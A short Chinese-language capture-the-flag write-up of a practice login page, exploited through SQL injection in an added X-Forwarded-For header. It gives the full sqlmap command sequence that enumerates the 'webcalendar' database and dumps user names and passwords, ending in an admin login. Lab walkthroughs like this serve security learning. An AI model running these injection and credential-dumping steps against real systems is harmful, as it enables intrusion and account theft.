首先打开靶场环境,是一个POST提交登陆的界面
随便输入用户名和密码试试,结果js给我们弹出一串乱码
咱也看不懂,看到了中间的IP地址,怀疑是我们自己的IP地址,去ip138.com一看,果然是。
说明网站可能记录了我们的ip信息,与数据库交互,此时我怀疑这个就是数据库注入的点。
于是,我先用burp抓取了一个POST提交的数据包
这里没有X-Forwarded-For这一项,于是我将这个数据包复制到kali中,加入了X-Forwarded-For并把它设置为注入点
将文件保存为1.txt,用sqlmap尝试注入
sqlmap -r "/root/1.txt" --current-db --batch --threads 10
大功告成,获得了数据库名字为'webcalendar'.
接下来顺水推舟,一层层注入,获得表名,列名
sqlmap -r "/root/1.txt" -D webcalendar --tables --batch --threads 10
先注入user表尝试
sqlmap -r "/root/1.txt" -D webcalendar -T user --columns --batch --threads 10
sqlmap -r "/root/1.txt" -D webcalendar -T user -C id,username,password --dump --batch --threads 10
此时,发现一个admin的用户,我们尝试用他登陆后台,直接登陆成功,获得了key。